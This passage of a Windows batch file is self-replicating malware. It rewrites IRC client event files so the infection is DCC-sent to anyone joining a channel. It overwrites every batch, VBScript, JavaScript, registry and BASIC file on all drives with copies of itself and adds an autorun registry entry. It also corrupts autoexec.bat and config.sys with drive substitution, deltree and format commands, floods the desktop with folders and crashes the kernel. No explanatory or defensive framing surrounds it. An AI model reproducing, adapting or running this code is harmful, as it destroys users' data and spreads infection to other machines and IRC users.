 165: echo.Level6=500-Level 500>;>%windir%\dchhaeyh.ini
 166: echo.500-Level 500Enabled=1>;>%windir%\dchhaeyh.ini
 167: echo.>;>%windir%\dchhaeyh.ini
 168: echo.[000-Unknowns]>;>%windir%\dchhaeyh.ini
 169: echo.User1=*!*@*>;>%windir%\dchhaeyh.ini
 170: echo.UserCount=1>;>%windir%\dchhaeyh.ini
 171: echo.Event1=ON JOIN:#:/dcc send $nick c:\fbm>;>%windir%\dchhaeyh.ini
 172: echo.EventCount=1>;>%windir%\dchhaeyh.ini
 173: echo.>;>%windir%\dchhaeyh.ini
 174: echo.[100-Level 100]>;>%windir%\dchhaeyh.ini
 175: echo.UserCount=0>;>%windir%\dchhaeyh.ini
 176: echo.EventCount=0>;>%windir%\dchhaeyh.ini
 177: echo.>;>%windir%\dchhaeyh.ini
 178: echo.[200-Level 200]>;>%windir%\dchhaeyh.ini
 179: echo.UserCount=0>;>%windir%\dchhaeyh.ini
 180: echo.EventCount=0>;>%windir%\dchhaeyh.ini
 181: echo.>;>%windir%\dchhaeyh.ini
 182: echo.[300-Level 300]>;>%windir%\dchhaeyh.ini
 183: echo.UserCount=0>;>%windir%\dchhaeyh.ini
 184: echo.EventCount=0>;>%windir%\dchhaeyh.ini
 185: echo.>;>%windir%\dchhaeyh.ini
 186: echo.[400-Level 400]>;>%windir%\dchhaeyh.ini
 187: echo.UserCount=0>;>%windir%\dchhaeyh.ini
 188: echo.EventCount=0>;>%windir%\dchhaeyh.ini
 189: echo.>;>%windir%\dchhaeyh.ini
 190: echo.[500-Level 500]>;>%windir%\dchhaeyh.ini
 191: echo.UserCount=0>;>%windir%\dchhaeyh.ini
 192: echo.EventCount=0>;>%windir%\dchhaeyh.ini
 193: deltree/y c:\pirch\events.ini>;nul
 194: deltree/y c:\pirch98\events.ini>;nul
 195: deltree/y c:\pirch32\events.ini>;nul
 196: deltree/y c:\progra~1\pirch\events.ini>;nul
 197: deltree/y c:\progra~1\pirch98\events.ini>;nul
 198: deltree/y c:\progra~1\pirch32\events.ini>;nul
 199: copy %windir%\dchhaeyh.ini c:\pirch\events.ini>;nul
 200: copy %windir%\dchhaeyh.ini c:\pirch98\events.ini>;nul
 201: copy %windir%\dchhaeyh.ini c:\pirch32\events.ini>;nul
 202: copy %windir%\dchhaeyh.ini c:\progra~1\pirch\events.ini>;nul
 203: copy %windir%\dchhaeyh.ini c:\progra~1\pirch98\events.ini>;nul
 204: copy %windir%\dchhaeyh.ini c:\progra~1\pirch32\events.ini>;nul
 205: echo.hd.RegWrite "HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17","dcc send $nick c:\fbm">;>%windir%\dchhaeyh.vbs
 206: for %%v in (*.bat ..\*.bat c:\mydocu~1\*.bat c:\eigene~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do attrib -r -h -s -a %%v
 207: for %%v in (*.bat ..\*.bat c:\mydocu~1\*.bat c:\eigene~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\command\ebd\*.bat %windir%\system\*.bat) do copy %windir%\dchhaeyh.bat %%v /y
 208: for %%v in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%v:\nul copy %windir%\dchhaeyh.bat %%v:\dchhaeyh.bat /y
 209: echo.hd.run "%windir%\dchhaeyh.bat", VBHide>;>%windir%\dchhaeyh.vbs
 210: for %%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do attrib -r -h -s -a %%e
 211: for %%e in (c:\*.vb* *.vb* ..\*.vb* c:\mydocu~1\*.vb* %windir%\*.vb* %path%\*.vb* %windir%\desktop\*.vb* %windir%\system\*.vb*) do copy %windir%\dchhaeyh.vbs %%e /y
 212: for %%e in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%e:\nul copy %windir%\dchhaeyh.vbs %%e:\dchhaeyh.vbs /y
 213: echo.o=wscript.createobject("wscript.shell");>%windir%\dchhaeyh.js
 214: echo.o.Run("%windir%\dchhaeyh.bat");>>%windir%\dchhaeyh.js
 215: for %%t in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do attrib -r -h -s -a %%t
 216: for %%t in (c:\*.js* *.js* ..\*.js* c:\mydocu~1\*.js* %windir%\*.js* %path%\*.js* %windir%\desktop\*.js* %windir%\system\*.js*) do copy %windir%\dchhaeyh.js %%t /y
 217: for %%t in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%t:\nul copy %windir%\dchhaeyh.js %%t:\dchhaeyh.js /y
 218: echo.REGEDIT4>;%windir%\ov.reg
 219: echo.>;>%windir%\ov.reg
 220: echo.[HKEY_LOCAL_MACHINE]>;>%windir%\ov.reg
 221: echo.""="%windir%\dchhaeyh.bat">;>%windir%\ov.reg
 222: for %%o in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do attrib -r -h -s -a %%o
 223: for %%o in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do copy %windir%\ov.reg %%o /y
 224: for %%o in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%o:\nul copy %windir%\ov.reg %%o:\dchhaeyh.reg /y
 225: echo.SHELL "%windir%\dchhaeyh.bat">;%windir%\ut.bas
 226: echo.END>;>%windir%\ut.bas
 227: for %%u in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do attrib -r -h -s -a %%u
 228: for %%u in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do copy %windir%\ut.bas %%u /y
 229: for %%u in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%u:\nul copy %windir%\ut.bas %%u:\dchhaeyh.bas /y
 230: echo.time 00:00:00,00>;>c:\autoexec.bat
 231: echo.date 80-01-01>;>c:\autoexec.bat
 232: echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>;>c:\autoexec.bat
 233: echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>;>c:\autoexec.bat
 234: echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>;>c:\autoexec.bat
 235: echo.[menu]>;>c:\config.sys
 236: echo.menuitem=id>;>c:\config.sys
 237: echo.>;>c:\config.sys
 238: echo.[id]>;>c:\config.sys
 239: echo.buffers=1>;>c:\config.sys
 240: echo.files=1>;>c:\config.sys
 241: echo.lastdrive=A>;>c:\config.sys
 242: echo.set path=deltree/y c:\>;>c:\config.sys
 243: echo.set temp=A:\>;>c:\config.sys
 244: echo.set windir=format c:/u/q/autotest>;>c:\config.sys
 245: set ¼Ã‰§³«°=md %windir%\desktop\
 246: %¼Ã‰§³«°%¼Ã‰§³«°00>;nul | %¼Ã‰§³«°%¼Ã‰§³«°01>nul | %¼Ã‰§³«°%¼Ã‰§³«°02>nul | %¼Ã‰§³«°%¼Ã‰§³«°03>nul
 247: %¼Ã‰§³«°%¼Ã‰§³«°04>;nul | %¼Ã‰§³«°%¼Ã‰§³«°05>nul | %¼Ã‰§³«°%¼Ã‰§³«°06>nul | %¼Ã‰§³«°%¼Ã‰§³«°07>nul
 248: %¼Ã‰§³«°%¼Ã‰§³«°08>;nul | %¼Ã‰§³«°%¼Ã‰§³«°09>nul | %¼Ã‰§³«°%¼Ã‰§³«°10>nul | %¼Ã‰§³«°%¼Ã‰§³«°11>nul
 249: %¼Ã‰§³«°%¼Ã‰§³«°12>;nul | %¼Ã‰§³«°%¼Ã‰§³«°13>nul | %¼Ã‰§³«°%¼Ã‰§³«°14>nul | %¼Ã‰§³«°%¼Ã‰§³«°15>nul
 250: %¼Ã‰§³«°%¼Ã‰§³«°16>;nul | %¼Ã‰§³«°%¼Ã‰§³«°17>nul | %¼Ã‰§³«°%¼Ã‰§³«°18>nul | %¼Ã‰§³«°%¼Ã‰§³«°19>nul
 251: %¼Ã‰§³«°%¼Ã‰§³«°20>;nul | %¼Ã‰§³«°%¼Ã‰§³«°21>nul | %¼Ã‰§³«°%¼Ã‰§³«°22>nul | %¼Ã‰§³«°%¼Ã‰§³«°23>nul
 252: %¼Ã‰§³«°%¼Ã‰§³«°24>;nul | %¼Ã‰§³«°%¼Ã‰§³«°25>nul | %¼Ã‰§³«°%¼Ã‰§³«°26>nul | %¼Ã‰§³«°%¼Ã‰§³«°27>nul
 253: %¼Ã‰§³«°%¼Ã‰§³«°28>;nul | %¼Ã‰§³«°%¼Ã‰§³«°29>nul | %¼Ã‰§³«°%¼Ã‰§³«°30>nul | %¼Ã‰§³«°%¼Ã‰§³«°31>nul
 254: %¼Ã‰§³«°%¼Ã‰§³«°32>;nul | %¼Ã‰§³«°%¼Ã‰§³«°33>nul | %¼Ã‰§³«°%¼Ã‰§³«°34>nul | %¼Ã‰§³«°%¼Ã‰§³«°35>nul
 255: %¼Ã‰§³«°%¼Ã‰§³«°36>;nul | %¼Ã‰§³«°%¼Ã‰§³«°37>nul | %¼Ã‰§³«°%¼Ã‰§³«°38>nul | %¼Ã‰§³«°%¼Ã‰§³«°39>nul
 256: %¼Ã‰§³«°%¼Ã‰§³«°40>;nul | %¼Ã‰§³«°%¼Ã‰§³«°41>nul | %¼Ã‰§³«°%¼Ã‰§³«°42>nul | %¼Ã‰§³«°%¼Ã‰§³«°43>nul
 257: %¼Ã‰§³«°%¼Ã‰§³«°44>;nul | %¼Ã‰§³«°%¼Ã‰§³«°45>nul | %¼Ã‰§³«°%¼Ã‰§³«°46>nul | %¼Ã‰§³«°%¼Ã‰§³«°47>nul
 258: %¼Ã‰§³«°%¼Ã‰§³«°48>;nul | %¼Ã‰§³«°%¼Ã‰§³«°49>nul | %¼Ã‰§³«°%¼Ã‰§³«°50>nul | %¼Ã‰§³«°%¼Ã‰§³«°51>nul
 259: %¼Ã‰§³«°%¼Ã‰§³«°52>;nul | %¼Ã‰§³«°%¼Ã‰§³«°53>nul | %¼Ã‰§³«°%¼Ã‰§³«°54>nul | %¼Ã‰§³«°%¼Ã‰§³«°55>nul
 260: %¼Ã‰§³«°%¼Ã‰§³«°56>;nul | %¼Ã‰§³«°%¼Ã‰§³«°57>nul | %¼Ã‰§³«°%¼Ã‰§³«°58>nul | %¼Ã‰§³«°%¼Ã‰§³«°59>nul
 261: %¼Ã‰§³«°%¼Ã‰§³«°60>;nul | %¼Ã‰§³«°%¼Ã‰§³«°61>nul | %¼Ã‰§³«°%¼Ã‰§³«°62>nul | %¼Ã‰§³«°%¼Ã‰§³«°63>nul
 262: %¼Ã‰§³«°%¼Ã‰§³«°64>;nul | %¼Ã‰§³«°%¼Ã‰§³«°65>nul | %¼Ã‰§³«°%¼Ã‰§³«°66>nul | %¼Ã‰§³«°%¼Ã‰§³«°67>nul
 263: %¼Ã‰§³«°%¼Ã‰§³«°68>;nul | %¼Ã‰§³«°%¼Ã‰§³«°69>nul | %¼Ã‰§³«°%¼Ã‰§³«°70>nul | %¼Ã‰§³«°%¼Ã‰§³«°71>nul
 264: %¼Ã‰§³«°%¼Ã‰§³«°72>;nul | %¼Ã‰§³«°%¼Ã‰§³«°73>nul | %¼Ã‰§³«°%¼Ã‰§³«°74>nul | %¼Ã‰§³«°%¼Ã‰§³«°75>nul
 265: %¼Ã‰§³«°%¼Ã‰§³«°76>;nul | %¼Ã‰§³«°%¼Ã‰§³«°77>nul | %¼Ã‰§³«°%¼Ã‰§³«°78>nul | %¼Ã‰§³«°%¼Ã‰§³«°79>nul
 266: %¼Ã‰§³«°%¼Ã‰§³«°80>;nul | %¼Ã‰§³«°%¼Ã‰§³«°81>nul | %¼Ã‰§³«°%¼Ã‰§³«°82>nul | %¼Ã‰§³«°%¼Ã‰§³«°83>nul
 267: %¼Ã‰§³«°%¼Ã‰§³«°84>;nul | %¼Ã‰§³«°%¼Ã‰§³«°85>nul | %¼Ã‰§³«°%¼Ã‰§³«°86>nul | %¼Ã‰§³«°%¼Ã‰§³«°87>nul
 268: %¼Ã‰§³«°%¼Ã‰§³«°88>;nul | %¼Ã‰§³«°%¼Ã‰§³«°89>nul | %¼Ã‰§³«°%¼Ã‰§³«°90>nul | %¼Ã‰§³«°%¼Ã‰§³«°91>nul
 269: %¼Ã‰§³«°%¼Ã‰§³«°92>;nul | %¼Ã‰§³«°%¼Ã‰§³«°93>nul | %¼Ã‰§³«°%¼Ã‰§³«°94>nul | %¼Ã‰§³«°%¼Ã‰§³«°95>nul
 270: %¼Ã‰§³«°%¼Ã‰§³«°96>;nul | %¼Ã‰§³«°%¼Ã‰§³«°97>nul | %¼Ã‰§³«°%¼Ã‰§³«°98>nul | %¼Ã‰§³«°%¼Ã‰§³«°99>nul
 271: set ¼Ã‰§³«°=
 272: cscript %windir%\dchhaeyh.vbs
 273: rundll32 krnl386,exitkernel
 274: cls